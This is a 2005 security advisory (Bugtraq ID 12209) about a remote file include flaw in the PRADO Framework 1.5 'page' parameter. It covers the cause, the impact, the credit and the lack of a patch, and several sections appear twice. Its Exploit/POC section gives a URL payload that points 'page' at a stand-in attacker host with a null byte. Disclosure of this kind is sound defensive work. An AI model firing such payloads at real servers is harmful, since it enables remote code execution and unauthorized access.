PRADO Page Parameter Remote File Include Vulnerability
BID:12209
Info
PRADO Page Parameter Remote File Include Vulnerability
| Bugtraq ID: | 12209 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2005 12:00AM |
| Updated: | Jan 10 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Paul Brereton. |
| Vulnerable: |
PRADO PRADO Framework 1.5 |
| Not Vulnerable: | |
Discussion
PRADO Page Parameter Remote File Include Vulnerability
A remote file include vulnerability affects PRADO. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
A remote file include vulnerability affects PRADO. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Exploit / POC
PRADO Page Parameter Remote File Include Vulnerability
The following example is available:
http://www.example.com/examples/phonebook.php?page=http://www.evilserver.com/evilcode.txt%00&filter=P
The following example is available:
http://www.example.com/examples/phonebook.php?page=http://www.evilserver.com/evilcode.txt%00&filter=P
Solution / Fix
PRADO Page Parameter Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.